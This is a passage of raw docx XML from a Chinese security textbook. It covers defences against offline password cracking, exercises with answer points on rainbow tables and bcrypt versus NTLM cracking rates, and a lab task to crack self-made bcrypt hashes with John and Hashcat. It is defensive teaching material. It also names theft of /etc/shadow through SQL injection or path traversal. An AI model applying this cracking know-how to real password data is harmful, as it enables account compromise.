      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用无盐快速哈希（如单次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5、SHA-1、甚至无盐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256）存储口令；也禁止使用可逆加密。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在服务器端部署完整性文件监控（FIM），防止攻击者窃取备份或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件；使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收集异常数据库访问事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">口令策略与多因素认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施合理长度下限（如至少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符）并鼓励长口令短语，但避免过度复杂的组合规则导致用户产生可预测的变体。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">强制检测并拒绝已知泄露库中的口令（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> k-anonymity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pwned Passwords </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">推动无密码认证或至少两步验证，使得单纯窃取口令哈希不足以获得访问权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">泄露面收敛</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定期审计数据库备份、日志和临时文件，确保不包含未加密的哈希库存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应用账号配置最小权限，防止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入或路径遍历泄露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等系统文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段：限制数据库服务器的内部可达性，防止横向移动直接抓取密码表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队响应离线泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若已检测到哈希数据库外泄，应立即强制所有受影响用户密码失效并重置，同时启动事件响应流程，但因攻击者已离线，传统阻断无效，必须依靠事前的密码学防御强度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="247"/>
    <w:bookmarkStart w:id="250" w:name="习题提取题-靶机迁移任务"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题（提取题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="248" w:name="提取题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：解释彩虹表攻击如何实现“时空权衡”。它相较于纯穷举攻击节省了什么样的资源？为何必须为每个盐重新构建表？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回忆预计算链与归约函数的工作流程，比较直接穷举、普通预计算表（如字典的哈希映射）和彩虹表的存储开销与查询开销。盐是如何参与哈希计算的？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：彩虹表通过预计算生成大量链，只存储起点和终点，查询时反向搜索终点以还原口令。攻击时复杂度从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>N</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">降为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>O</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>k</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（链长度）。盐与口令拼接后，每个盐导致哈希函数等价于“个性化”的新函数，预计算表格不通用，因此必须为每个盐单独构建，总构建代价近似于暴力穷举，从而消除预计算优势。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrpyt/Argon2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这类慢哈希可以阻止暴力破解，而快速哈希（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM）却不行？盐在其中分别扮演什么角色？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从攻击者每秒可执行的哈希次数入手，计算攻破一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位全字符口令所需时间，比较不同哈希函数下的时间级别差异。说明慢哈希与盐的组合效果。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：慢哈希通过大量迭代或内存访问限制每秒猜测次数，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt cost 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">约可做到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10^4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次/秒每</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GPU，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可达</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10^10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次/秒。暴力搜索空间为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">8≈10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">{15}，对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只需约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10^5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒（1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">天多），bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10^{11} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒（上千年）。盐不能减缓单次计算，但它破坏预计算（彩虹表），强制攻击者进行实时暴力，此时慢哈希的成本差异则完全显现。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="248"/>
    <w:bookmarkStart w:id="249" w:name="靶机迁移任务-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在自己的隔离实验室中，生成一组使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希（不指定用户名）的测试文件，含有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个不同强度的口令（一个出现在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rockyou.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，一个随机生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位，一个常见弱口令）。分别使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> John </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试字典攻击，观察并记录以下内容：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哪些被成功破解？破解所需时间大致多少？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt cost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提高到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">12，破解速度有何变化？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若在同一文件中使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MD5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无盐，结果有何不同？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写出简要报告，附命令截图，并解释防御措施的效果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在任何非授权环境中使用真实泄露的数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节从“猜了再哈希比对”的朴素直觉出发，层层递进至字典、掩码、暴力攻击的搜索策略，并详细阐述了彩虹表作为预计算攻击的时空权衡机理及其被盐彻底破功的密码学原因。John</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Ripper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实操环节则让读者在隔离靶机中体验离线爆破的真实流程，理解哈希类型识别、字典覆盖、算力估算等实用技能。最终，防御对照框将知识收敛于现实世界的安全实践：强口令、唯一盐、慢哈希</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与最小化泄露面，共同构成抵抗离线密码破解的纵深防线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Aumasson,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Serious Cryptography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章关于哈希与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的深入讲解。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Password Storage Cheat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sheet：当前最佳实践与算法参数建议。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Ferguson, Schneier, and Kohno,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptography Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章讨论口令的安全存储与密钥派生。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CM5：数论、RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与哈希函数的数学背景。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="249"/>
    <w:bookmarkEnd w:id="250"/>
    <w:bookmarkStart w:id="251" w:name="密码学误用与-tls-弱点正确实践习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码学误用与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱点·正确实践·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节讨论的密码学误用与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱点，要求读者已掌握《从位到物联》CM5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数论与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理、哈希与对称加密基本构造；同时应已阅读本卷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节关于哈希破解、彩虹表与盐的机理。本节不再重复推导</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数学或哈希函数定义，直接使用这些概念分析误用场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
